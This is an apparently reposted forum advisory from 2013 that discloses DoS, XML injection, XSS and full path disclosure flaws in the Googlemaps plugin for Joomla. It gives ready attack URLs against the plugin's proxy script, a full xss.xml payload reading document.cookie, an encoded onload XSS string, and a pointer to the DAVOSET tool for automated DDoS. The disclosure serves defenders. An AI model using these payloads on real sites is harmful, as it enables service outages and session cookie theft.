thehat Posted August 27, 2013 Report Share Posted August 27, 2013 These are Denial of Service, XML Injection, Cross-Site Scripting and Fullpath disclosure vulnerabilities in Googlemaps plugin for Joomla.-------------------------Affected products:-------------------------Vulnerable are Googlemaps plugin for Joomla versions 2.x and 3.x andpotentially previous versions. In new version of DAVOSET I'll add a lot ofweb sites with Googlemaps plugin.-------------------------Affected vendors:-------------------------Mike ReumerGooglemaps Plugin - Joomla! Extensions Directory----------Details:----------Denial of Service (WASC-10):http://site/plugins/content/plugin_googlemap2_proxy.php?url=site2/large_fileBesides conducting DoS attack manually, it's also possible to conductautomated DoS and DDoS attacks with using of DAVOSET(http://lists.webappsec.org/pipermail/websecurity_lists.webappsec.org/2013-June/008850.html).XML Injection (WASC-23):http://site/plugins/content/plugin_googlemap2_proxy.php?url=site2/xml.xmlIt's possible to include external xml-files. Which also can be used for XSSattack:XSS via XML Injection (WASC-23):http://site/plugins/content/plugin_googlemap2_proxy.php?url=site2/xss.xmlFile xss.xml:<?xml version="1.0" encoding="utf-8"?><feed> <title>XSS</title> <entry> <divxmlns="http://www.w3.org/1999/xhtml"><script>alert(document.cookie)</script></div> </entry></feed>Cross-Site Scripting (WASC-08):http://site/plugins/content/plugin_googlemap2_proxy.php?url=%3Cbody%20onload=alert(document.cookie)%3EFull path disclosure (WASC-13):http://site/plugins/content/plugin_googlemap2_proxy.phpBesides plugin_googlemap2_proxy.php, also happensplugin_googlemap3_proxy.php (but it has other path at web sites).Best wishes & regards,MustLiveAdministrator of Websecurity web sitehttp://websecurity.com.ua# 3782C828C3E6E81E 1337day.com [2013-08-28] A70DB80C325E4592 #Sursa: 1337day Inj3ct0r Exploit Database : vulnerability : 0day : shellcode by Inj3ct0r Team Quote Link to comment Share on other sites More sharing options...
